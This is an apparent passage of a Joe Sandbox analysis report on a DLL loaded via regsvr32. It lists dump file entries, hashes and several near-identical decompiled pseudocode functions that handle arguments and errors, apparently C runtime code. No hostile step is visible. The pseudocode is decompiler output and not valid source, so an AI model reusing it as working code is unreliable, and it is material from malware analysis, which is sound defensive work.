                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction ID: 5732aa1caccd3b45bc80365d56803706c4771e0419ced875683dd99db73042d2
                                                                      • Opcode Fuzzy Hash: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction Fuzzy Hash: 9F31A272218A48C6EB618F29E0443AD77A0F78DB8CF658125EB4C0B751CF76C556C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E0000000118001A4D8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001a503;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x8001a5d2;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001a544;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001a5d4;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001a5c4;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8001a580;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8001a5d4;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180017AF4(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x8001a578;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001a57b;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x18001a4d8
                                                                      0x18001a4e9
                                                                      0x18001a4ec
                                                                      0x18001a4ee
                                                                      0x18001a4f3
                                                                      0x18001a4fb
                                                                      0x18001a4fe
                                                                      0x18001a50d
                                                                      0x18001a50f
                                                                      0x18001a515
                                                                      0x18001a518
                                                                      0x18001a51d
                                                                      0x18001a521
                                                                      0x18001a528
                                                                      0x18001a52e
                                                                      0x18001a533
                                                                      0x18001a538
                                                                      0x18001a53f
                                                                      0x18001a54f
                                                                      0x18001a551
                                                                      0x18001a55b
                                                                      0x18001a560
                                                                      0x18001a568
                                                                      0x18001a56a
                                                                      0x18001a570
                                                                      0x18001a575
                                                                      0x18001a578
                                                                      0x18001a57e
                                                                      0x18001a580
                                                                      0x18001a584
                                                                      0x18001a58a
                                                                      0x18001a594
                                                                      0x18001a596
                                                                      0x18001a59a
                                                                      0x18001a59d
                                                                      0x18001a5a4
                                                                      0x18001a5a8
                                                                      0x18001a5af
                                                                      0x18001a5b3
                                                                      0x18001a5b8
                                                                      0x18001a5bd
                                                                      0x18001a5c2
                                                                      0x18001a5cf
                                                                      0x18001a5de

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction ID: c1a010da05129dd8772f653890682c59714ceae2677adc7753846f9488137f9c
                                                                      • Opcode Fuzzy Hash: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction Fuzzy Hash: FD31917220CE48C6EB618F29D0403AD7BA5F38DB98F658125EB4D0B751DF36C596DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E0000000118001C574(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001c59f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x8001c66e;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001c5e0;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001c670;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001c660;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8001c61c;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8001c670;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180010A8C(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x8001c614;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001c617;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x18001c574
                                                                      0x18001c585
                                                                      0x18001c588
                                                                      0x18001c58a
                                                                      0x18001c58f
                                                                      0x18001c597
                                                                      0x18001c59a
                                                                      0x18001c5a9
                                                                      0x18001c5ab
                                                                      0x18001c5b1
                                                                      0x18001c5b4
                                                                      0x18001c5b9
                                                                      0x18001c5bd
                                                                      0x18001c5c4
                                                                      0x18001c5ca
                                                                      0x18001c5cf
                                                                      0x18001c5d4
                                                                      0x18001c5db
                                                                      0x18001c5eb
                                                                      0x18001c5ed
                                                                      0x18001c5f7
                                                                      0x18001c5fc
                                                                      0x18001c604
                                                                      0x18001c606
                                                                      0x18001c60c
                                                                      0x18001c611
                                                                      0x18001c614
                                                                      0x18001c61a
                                                                      0x18001c61c
                                                                      0x18001c620
                                                                      0x18001c626
                                                                      0x18001c630
                                                                      0x18001c632
                                                                      0x18001c636
                                                                      0x18001c639
                                                                      0x18001c640
                                                                      0x18001c644
                                                                      0x18001c64b
                                                                      0x18001c64f
                                                                      0x18001c654
                                                                      0x18001c659
                                                                      0x18001c65e
                                                                      0x18001c66b
                                                                      0x18001c67a

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction ID: bde0433070b205bb62be1dc466d7d1d6ca198d0f40e398eb64eb4654515f2d48
                                                                      • Opcode Fuzzy Hash: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction Fuzzy Hash: 7A317E72204A4886EB618F29D0407AD77A0F39DF8CF249125DB4C4B750DF36C596DB09
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001A5E4(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001a60f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x8001a6dc;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001a650;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001a6de;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001a6ce;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001a68a;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001a6de;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E00000001180015A5C(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001a682;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001a685;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x18001a5e4
                                                                      0x18001a5f5
                                                                      0x18001a5f8
                                                                      0x18001a5fa
                                                                      0x18001a5ff
                                                                      0x18001a607
                                                                      0x18001a60a
                                                                      0x18001a619
                                                                      0x18001a61b
                                                                      0x18001a621
                                                                      0x18001a624
                                                                      0x18001a629
                                                                      0x18001a62d
                                                                      0x18001a634
                                                                      0x18001a63a
                                                                      0x18001a63f
                                                                      0x18001a644
                                                                      0x18001a64b
                                                                      0x18001a65b
                                                                      0x18001a65d
                                                                      0x18001a667
                                                                      0x18001a66b
                                                                      0x18001a673
                                                                      0x18001a675
                                                                      0x18001a67b
                                                                      0x18001a67f
                                                                      0x18001a682
                                                                      0x18001a688
                                                                      0x18001a68a
                                                                      0x18001a68e
                                                                      0x18001a694
                                                                      0x18001a69e
                                                                      0x18001a6a0
                                                                      0x18001a6a4
                                                                      0x18001a6a7
                                                                      0x18001a6ae
                                                                      0x18001a6b2
                                                                      0x18001a6b9
                                                                      0x18001a6bd
                                                                      0x18001a6c2
                                                                      0x18001a6c7
                                                                      0x18001a6cc
                                                                      0x18001a6d9
                                                                      0x18001a6e8

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction ID: 157d837d2fd8596eefb3168dea07aaf0722d1f4b5514b464367715ff9f20b716
                                                                      • Opcode Fuzzy Hash: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction Fuzzy Hash: F831A472208B48C6EB618F29D4503AD77A4F39DB8CF198115EB8C0B755CF36C556DB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E0000000118001C67C(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001c6a7;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x8001c776;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001c6e8;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001c778;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001c768;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8001c724;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8001c778;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180010A8C(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x8001c71c;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001c71f;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x18001c67c
                                                                      0x18001c68d
                                                                      0x18001c690
                                                                      0x18001c692
                                                                      0x18001c697
                                                                      0x18001c69f
                                                                      0x18001c6a2
                                                                      0x18001c6b1
                                                                      0x18001c6b3
                                                                      0x18001c6b9
                                                                      0x18001c6bc
                                                                      0x18001c6c1
                                                                      0x18001c6c5
                                                                      0x18001c6cc
                                                                      0x18001c6d2
                                                                      0x18001c6d7
                                                                      0x18001c6dc
                                                                      0x18001c6e3
                                                                      0x18001c6f3
                                                                      0x18001c6f5
                                                                      0x18001c6ff
                                                                      0x18001c704
                                                                      0x18001c70c
                                                                      0x18001c70e
                                                                      0x18001c714
                                                                      0x18001c719
                                                                      0x18001c71c
                                                                      0x18001c722
                                                                      0x18001c724
                                                                      0x18001c728
                                                                      0x18001c72e
                                                                      0x18001c738
                                                                      0x18001c73a
                                                                      0x18001c73e
                                                                      0x18001c741
                                                                      0x18001c748
                                                                      0x18001c74c
                                                                      0x18001c753
                                                                      0x18001c757
                                                                      0x18001c75c
                                                                      0x18001c761
                                                                      0x18001c766
                                                                      0x18001c773
                                                                      0x18001c782

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction ID: 2c6a1334f43bf09cb6a6714f9bde598fdf389675b06cf59035ac368b988888e0
                                                                      • Opcode Fuzzy Hash: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction Fuzzy Hash: CA31A276208B48C6EB618F29E0407AD77A4F38DF88F648125DB8D4B750CF36C556CB09
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001C784(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001c7af;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x8001c87c;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001c7f0;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001c87e;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001c86e;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001c82a;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001c87e;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E0000000118000E818(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001c822;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001c825;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x18001c784
                                                                      0x18001c795
                                                                      0x18001c798
                                                                      0x18001c79a
                                                                      0x18001c79f
                                                                      0x18001c7a7
                                                                      0x18001c7aa
                                                                      0x18001c7b9
                                                                      0x18001c7bb
                                                                      0x18001c7c1
                                                                      0x18001c7c4
                                                                      0x18001c7c9
                                                                      0x18001c7cd
                                                                      0x18001c7d4
                                                                      0x18001c7da
                                                                      0x18001c7df
                                                                      0x18001c7e4
                                                                      0x18001c7eb
                                                                      0x18001c7fb
                                                                      0x18001c7fd
                                                                      0x18001c807
                                                                      0x18001c80b
                                                                      0x18001c813
                                                                      0x18001c815
                                                                      0x18001c81b
                                                                      0x18001c81f
                                                                      0x18001c822
                                                                      0x18001c828
                                                                      0x18001c82a
                                                                      0x18001c82e
                                                                      0x18001c834
                                                                      0x18001c83e
                                                                      0x18001c840
                                                                      0x18001c844
                                                                      0x18001c847
                                                                      0x18001c84e
                                                                      0x18001c852
                                                                      0x18001c859
                                                                      0x18001c85d
                                                                      0x18001c862
                                                                      0x18001c867
                                                                      0x18001c86c
                                                                      0x18001c879
                                                                      0x18001c888

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
